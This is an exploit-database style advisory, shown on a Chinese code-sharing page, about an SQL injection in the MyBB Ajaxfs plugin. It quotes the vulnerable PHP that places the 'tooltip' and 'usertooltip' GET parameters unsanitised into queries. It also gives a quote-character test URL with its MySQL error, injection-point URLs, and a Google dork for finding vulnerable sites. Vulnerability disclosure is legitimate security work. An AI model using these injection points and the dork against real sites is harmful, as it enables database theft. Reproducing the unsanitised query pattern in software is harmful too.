扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 |
########################### # Mybb Ajaxfs Plugin Sql Injection vulnerability ########################### ################################# # # @@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@ # @@@@@@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@ # @@@@@@@@@@@ @@@ @@@@@@@@@@@ # @@@@@@@@@@@ @@@ @@@@@@@@@@@ # @@@@@@@@@@@@@@@@@ @ @@@@@@@@@@@@@@@@@@@ # @@@@@@@@@@@@@@@@@ @@@@@ @@@@@@@@@@@ # @@@@@@@@@ @@@@@ @@ @@@@@@@@@ @@@ # @@@@@@@@@ @@@@@ @@ @@@@@@@@@@@@ # @@@@@@@@@@@@@@@@@@@ @@@@@@@@@@ @@@@@@@@@ @@@ # ##################################### # Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability # Author : Iranian Exploit DataBase # Discovered By : IeDb # Email : [email protected]-[email protected] # Home : http://iedb.ir - http://iedb.ir/acc # Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538 # Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2 # Security Risk : High # Tested on : Linux # Dork : inurl:ajaxfs.php ################################# 1) if(isset($_GET['tooltip'])) { $pid=$_GET['tooltip']; $query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'"); 2) if(isset($_GET['usertooltip'])) { $uid=$_GET['usertooltip']; $query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'"); http://localhost/Upload/ajaxfs.php?usertooltip=1' 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 Google DORK : inurl:ajaxfs.php # Exploit : # http://site.com/mybb/ajaxfs.php?tooltip=[sql] # http://site.com/mybb/ajaxfs.php?usertooltip=[sql] ################################# # Tnx To : All Member In Iedb.ir/acc & Iranian Hackers ################################# |
体验盒子
